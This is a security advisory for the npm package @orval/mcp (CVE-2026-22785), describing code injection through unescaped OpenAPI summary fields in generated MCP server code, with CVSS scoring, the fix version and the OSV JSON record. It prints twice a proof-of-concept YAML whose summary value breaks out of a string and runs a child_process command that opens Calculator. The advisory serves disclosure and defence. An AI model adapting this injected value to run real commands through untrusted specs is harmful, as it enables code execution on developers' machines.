GHSA-MWR6-3GP8-9JMJ

Vulnerability from github – Published: 2026-01-13 19:12 – Updated: 2026-01-13 19:12
VLAI?
Summary
orval MCP client is vulnerable to a code injection attack.
Details

Impact

The MCP server generation logic relies on string manipulation that incorporates the summary field from the OpenAPI specification without proper validation or escaping. This allows an attacker to "break out" of the string literal and inject arbitrary code.

Here is an example OpenAPI with the exploit

```yaml openapi: 3.0.4 info: title: Swagger Petstore - OpenAPI 3.0 description: |- This is a sample Pet Store Server based on the OpenAPI 3.0 specification. You can find out more about Swagger at https://swagger.io. In the third iteration of the pet store, we've switched to the design first approach! You can now help us improve the API whether it's by making changes to the definition itself or to the code. That way, with time, we can improve the API in general, and expose some of the new features in OAS3.

Some useful links:
- [The Pet Store repository](https://github.com/swagger-api/swagger-petstore)
- [The source API definition for the Pet Store](https://github.com/swagger-api/swagger-petstore/blob/master/src/main/resources/openapi.yaml)

termsOfService: https://swagger.io/terms/ contact: email: apiteam@swagger.io license: name: Apache 2.0 url: https://www.apache.org/licenses/LICENSE-2.0.html version: 1.0.27-SNAPSHOT externalDocs: description: Find out more about Swagger url: https://swagger.io servers: - url: https://petstore3.swagger.io/api/v3 tags: - name: pet description: Everything about your Pets externalDocs: description: Find out more url: https://swagger.io - name: store description: Access to Petstore orders externalDocs: description: Find out more about our store url: https://swagger.io - name: user description: Operations about user paths: /pet/findByStatus: get: tags: - pet summary: Finds Pets by status.' + require('child_process').execSync("open -a Calculator").toString(),// description: Multiple status values can be provided with comma separated strings. operationId: findPetsByStatus parameters: - name: status in: query description: Status values that need to be considered for filter schema: type: string responses: '200': description: successful operation content: application/json: schema: type: string '400': description: Invalid status value default: description: Unexpected error security: - petstore_auth: - write:pets - read:pets ```

Patches

This is fixed in version 7.18.0 or higher

Workarounds

Do check your generated OpenAPI yaml/json before running through Orval CLI and correct it if it has injection.

Severity ?
9.3 (Critical)
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
Show details on source website
To clipboard 

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "@orval/mcp"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "7.18.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-22785"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-77"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-01-13T19:12:22Z",
    "nvd_published_at": "2026-01-12T19:16:04Z",
    "severity": "CRITICAL"
  },
  "details": "### Impact\nThe MCP server generation logic relies on string manipulation that incorporates the summary field from the OpenAPI specification without proper validation or escaping. This allows an attacker to \"break out\" of the string literal and inject arbitrary code.\n\nHere is an example OpenAPI with the exploit\n\n```yaml\nopenapi: 3.0.4\ninfo:\n  title: Swagger Petstore - OpenAPI 3.0\n  description: |-\n    This is a sample Pet Store Server based on the OpenAPI 3.0 specification.  You can find out more about\n    Swagger at [https://swagger.io](https://swagger.io). In the third iteration of the pet store, we\u0027ve switched to the design first approach!\n    You can now help us improve the API whether it\u0027s by making changes to the definition itself or to the code.\n    That way, with time, we can improve the API in general, and expose some of the new features in OAS3.\n\n    Some useful links:\n    - [The Pet Store repository](https://github.com/swagger-api/swagger-petstore)\n    - [The source API definition for the Pet Store](https://github.com/swagger-api/swagger-petstore/blob/master/src/main/resources/openapi.yaml)\n  termsOfService: https://swagger.io/terms/\n  contact:\n    email: apiteam@swagger.io\n  license:\n    name: Apache 2.0\n    url: https://www.apache.org/licenses/LICENSE-2.0.html\n  version: 1.0.27-SNAPSHOT\nexternalDocs:\n  description: Find out more about Swagger\n  url: https://swagger.io\nservers:\n  - url: https://petstore3.swagger.io/api/v3\ntags:\n  - name: pet\n    description: Everything about your Pets\n    externalDocs:\n      description: Find out more\n      url: https://swagger.io\n  - name: store\n    description: Access to Petstore orders\n    externalDocs:\n      description: Find out more about our store\n      url: https://swagger.io\n  - name: user\n    description: Operations about user\npaths:\n  /pet/findByStatus:\n    get:\n      tags:\n        - pet\n      summary: Finds Pets by status.\u0027 + require(\u0027child_process\u0027).execSync(\"open -a Calculator\").toString(),//\n      description: Multiple status values can be provided with comma separated strings.\n      operationId: findPetsByStatus\n      parameters:\n        - name: status\n          in: query\n          description: Status values that need to be considered for filter\n          schema:\n            type: string\n      responses:\n        \u0027200\u0027:\n          description: successful operation\n          content:\n            application/json:\n              schema:\n                type: string\n        \u0027400\u0027:\n          description: Invalid status value\n        default:\n          description: Unexpected error\n      security:\n        - petstore_auth:\n            - write:pets\n            - read:pets\n ```\n  \n\n### Patches\nThis is fixed in version 7.18.0 or higher\n\n### Workarounds\nDo check your generated OpenAPI yaml/json before running through Orval CLI and correct it if it has injection.",
  "id": "GHSA-mwr6-3gp8-9jmj",
  "modified": "2026-01-13T19:12:22Z",
  "published": "2026-01-13T19:12:22Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/orval-labs/orval/security/advisories/GHSA-mwr6-3gp8-9jmj"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-22785"
    },
    {
      "type": "WEB",
      "url": "https://github.com/orval-labs/orval/commit/80b5fe73b94f120a3a5561952d6d4b0f8d7e928d"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/orval-labs/orval"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "orval MCP client is vulnerable to a code injection attack."
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.



Detection rules are retrieved from Rulezet.